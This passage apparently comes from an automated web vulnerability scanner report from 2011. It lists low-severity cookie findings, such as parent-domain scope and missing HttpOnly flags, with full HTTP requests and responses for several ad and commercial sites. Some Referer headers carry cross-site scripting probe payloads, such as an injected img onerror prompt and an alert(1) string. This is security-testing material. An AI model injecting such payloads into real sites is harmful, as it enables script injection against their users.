Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:02 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520225798%26kw%3D233292; domain=.reachlocal.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.reachlocal.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.reachlocal.com; path=/
Location: http://redirect.rtrk.com/redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520225798%26rl_key%3D747249abb89e424959a67c34a59e232e%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520225798%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0
Vary: Accept-Encoding
Content-Length: 1036
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://redirect.rtrk.com/redirect?RL_rurl=http:
...[SNIP]...

9.49. http://utdi.reachlocal.net/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:06 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309926%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; domain=.reachlocal.net; path=/
Set-Cookie: RlocalPROXY=RLPROXY%3D; domain=.reachlocal.net; path=/
Set-Cookie: RlocalPROXYLog=RLPROXYLog%3d0; domain=.reachlocal.net; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.reachlocal.net; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1; domain=.reachlocal.net; path=/
Location: /index.html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:59 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="/index.html">here</a>.</p>
<hr>
<address>Apache
...[SNIP]...

9.50. http://www.burstnet.com/enlightn/8117/3E06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/8117/3E06/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/8117/3E06/?01AD=3wa8tKA-mJ3zLI8brmO_1mZLAnzwl8-A9kddOUsNi9p23gomEmKZ1zA&01RI=F72DD362342178E&01NA= HTTP/1.1
Host: www.burstnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: TID=174q04v1muc3qi; CMP=1AF.1GYo^19q.1GYo; 56Q8=CT-1

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 06 Sep 2011 12:55:53 GMT
Content-Length: 43
Connection: close
Set-Cookie: 56Q8=3wa8tKA-mJ3zLI8brmO_1mZLAnzwl8-A9kddOUsNi9p23gomEmKZ1zA; expires=Tue, 04-Oct-2011 12:55:53 GMT; path=/; domain=.www.burstnet.com
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1AF.1GYo^19q.1Gbq; path=/; expires=Thu, 06-Sep-2012 12:55:52 GMT; domain=.burstnet.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

GIF89a.............!.......,...........D..;

9.51. https://www.comcast.com/Localization/Localize.cspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /Localization/Localize.cspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Localization/Localize.cspx?Referer=%2FShop%2FBuyFlow2%2Fproducts.cspx&SourcePage=Bundled&FormName=AddressOrZipCode&StreetName=&AptNumber=&Zip= HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331733|PC#1315327839174-766376.19#1316539473|check#true#1315329933; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331673649%3B%20gpv_07%3Dcorporate%2520-%2520customers%2520-%2520custcare%2520%7C1315331673661%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":6,"lc":{"d0":{"v":6,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 24713
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; domain=comcast.com; path=/
Date: Tue, 06 Sep 2011 12:24:44 GMT
Connection: Keep-Alive
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <script type="tex
...[SNIP]...

9.52. http://www.zillow.com/app  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /app

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app?chartDuration=1year&chartType=partner&cityRegionId=0&countyRegionId=0&height=140&nationRegionId=102001&neighborhoodRegionId=0&page=webservice%2FGetRegionChart&service=chart&showNation=true&stateRegionId=0&width=268&zipRegionId=0 HTTP/1.1
Host: www.zillow.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:19 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
X-Internal-Host: 216
X-Requested-Session: D96C22773BC539FD5BC226F64BB0D4A5
Expires: Wed, 07 Sep 2011 10:00:00 GMT
Cache-Control: no-cache
Content-Type: image/gif
Set-Cookie: abtest=1|SearchUnused1%3D94%3AHDPFilmStrip%3D68%3AHDPFinanceModule%3D78%3ABlank%3D73%3AComboLoader%3D36%3ABALSelection%3D8%3ATNCWidgetViewType%3D63%3AMobileBALTest%3D6%3ABALTest%3D83%3AZMMHomepageUpsell%3D85; Domain=.zillow.com; Expires=Mon, 06-Sep-2021 00:45:19 GMT; Path=/
Via: 1.1 www.zillow.com
Vary: User-Agent
Content-Length: 3878

GIF87a....................f.RRR.........................................................................................................................................................................
...[SNIP]...

10. Cookie without HttpOnly flag set  previous  next
There are 132 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. http://ads.adxpose.com/ads/ads.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=TVYMYp4lQTRs9JsS_40986728 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=539A6F0FF4C404245821CD09D3C3964E; Path=/
ETag: "20773-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:59 GMT
Content-Length: 11839

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

10.2. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D8383746361359954%3F&uid=TVYMYp4lQTRs9JsS_40986728&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1315331134985-48379358672536910&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=87AC969D42D890DD653C91255184546D; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 106
Date: Tue, 06 Sep 2011 12:45:59 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("TVYMYp4lQTRs9JsS_40986728");

10.3. http://pixel.everesttech.net/2565/c  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.everesttech.net
Path:   /2565/c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2565/c?ev_ct=d&ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811&url=http%3A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%3Futm_source%3Dyhofin%26utm_medium%3Dpaid-banner-ads%26utm_campaign%3D120x60-QuotesBttn%26utm_content%3Dstock%3AoldGrnBlk HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_session_v2=AXNOZhaIGXMAAIM3; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:34 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:34 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk
Content-Length: 364
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://landing.optionshouse.com/rate/395/yhofin
...[SNIP]...

10.4. http://pixel.everesttech.net/2565/i  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.everesttech.net
Path:   /2565/i

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2565/i?ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15uql37a6/M=601454399.602194378.673385551.687570551/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=n9rGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=1/X=3/*;ord=1315313286070877?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:09 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:09 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Vary: X-EF-Forwarded-For,Cookie,Host
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "2051142-80-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 128
Content-Type: image/png

.PNG
.
...IHDR.....................bKGD.............    pHYs...........~.....tIME......).......IDATx.c````........E@....IEND.B`.

10.5. http://sales.liveperson.net/visitor/addons/deploy.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=21807557&d_id=scottrade HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315262431881

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2124
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSQDBATSC=GHOHMFOBJJMKFFOJFIKJLOAA; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 21807557
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(ho
...[SNIP]...

10.6. https://www.fidelity.com/welcome/200-free-trades  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.fidelity.com
Path:   /welcome/200-free-trades

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome/200-free-trades HTTP/1.1
Host: www.fidelity.com
Connection: keep-alive
Referer: http://adserver.teracent.net/tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_798137&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=826091&rcu=http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC=90Vi^mj6PDU08DaQWofS_WBSF08SAk5mFqEKAyjtIAApBQACqjMGBAAAAQAGBU5mFqEAP03

Response

HTTP/1.1 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Length: 27674
Content-Type: text/html;charset=ISO-8859-1
Fsreqid: REQ4e6616b80a0328ee200040e30004aa33
Fscalleeid: fidweb321
Fselapsedtime: 64690
Date: Tue, 06 Sep 2011 12:48:56 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0857CAA8FA2A66D639C8268989A40DB3; path=/


...[SNIP]...

10.7. http://www.frontierhelp.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.frontierhelp.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.frontierhelp.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: ARPT=RNLPJJS10.160.118.41T0x0000000e_0xc7da91deCMYUJ; expires=Thu, 6-Sep-2012 12:45:15 GMT; path=/
Connection: close
Date: Tue, 06 Sep 2011 12:45:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=2324395;expires=Thu, 29-Aug-2041 12:45:20 GMT;path=/
Set-Cookie: CFTOKEN=20838155;expires=Thu, 29-Aug-2041 12:45:20 GMT;path=/
location: /frontiercare
Content-Type: text/html; charset=UTF-8


10.8. http://www.whitefence.com/a  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a HTTP/1.1
Host: www.whitefence.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet23bef%22%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3Eaffc43fb5c2/

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 06 Sep 2011 12:02:30 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=b5g3jlvu9jqg4vvgfhk6r1grh3; path=/
Pragma: no-cache
Location: http://www2.whitefence.com/a
Content-Type: text/html
Content-Length: 0


10.9. http://40.xg4ken.com/media/redir.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /media/redir.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/redir.php?prof=85&camp=2140&affcode=kw94444&cid=13569521491&networkType=search&url[]=http%3A%2F%2Fwww.whitefence.com%2Fcategory%2Fhome-phone%2F HTTP/1.1
Host: 40.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:51:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
